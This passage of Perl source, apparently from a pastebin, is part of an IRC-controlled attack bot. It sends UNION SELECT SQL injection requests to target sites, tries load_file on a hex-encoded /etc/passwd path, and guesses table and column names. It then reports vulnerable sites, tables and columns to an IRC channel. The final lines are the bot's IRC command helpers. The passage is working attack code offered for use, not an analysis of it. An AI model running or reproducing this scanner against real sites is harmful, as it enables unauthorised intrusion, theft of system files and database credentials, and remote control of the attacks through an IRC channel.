  1491.            $sql=$site."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
  1492.         $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
  1493.          if($response =~ /root:x:/)
  1494.                 {
  1495.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(2Load File15)14 $sql ");
  1496.                         }
  1497.          else
  1498.                 {
  1499.                 }
  1500.                   foreach $tabla(@tabele)
  1501.                 {
  1502.                   chomp($tabla);
  1503.                   $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  1504.                                  $response=get($sql)or die("[-] Impossible to get tables\n");
  1505.                   if($response =~ /loginpwnz/)
  1506.                     {
  1507.                     $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
  1508.                                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(2Tabel15)14 $sql ");
  1509.                                         &tabelka($site,$tabla);
  1510.                     }
  1511.                 }
  1512.                 }
  1513.         }                      
  1514. }
  1515.  
  1516. sub tabelka() {
  1517.                         my $site=$_[0];
  1518.                         my $tabla=$_[1];
  1519.                         my $cfin.="--";
  1520.                         my $cmn.= "+";
  1521.             chomp($tabla);
  1522.             foreach $columna(@kolumny)
  1523.             {
  1524.              chomp($columna);
  1525.              $sql=$site."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  1526.              $response=get($sql)or die("[-] Impossible to get columns\n");
  1527.              if ($response =~ /loginpwnz/)
  1528.                 {
  1529.                                 sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15) (2SQLi Vuln15)14 $site 15(2Kolom15)14 $columna 15(2Tabel15)14 $tabla ");
  1530.                 }
  1531.             }
  1532.        
  1533. }
  1534. sub nick {
  1535.     return unless $#_ == 0;
  1536.     sendraw("NICK $_[0]");
  1537. }
  1538.  
  1539. sub notice {
  1540.     return unless $#_ == 1;
  1541.     sendraw("NOTICE $_[0] :$_[1]");
  1542. }
  1543.  
  1544. sub join {
  1545. sendraw("JOIN $_[0]");
  1546. }
  1547.  
  1548. sub part {
  1549. sendraw("PART $_[0]");
  1550. }
  1551.  
  1552. sub quit {
  1553. sendraw("QUIT $_[0]");
  1554. exit;
  1555. }
create a new version of this paste RAW Paste Data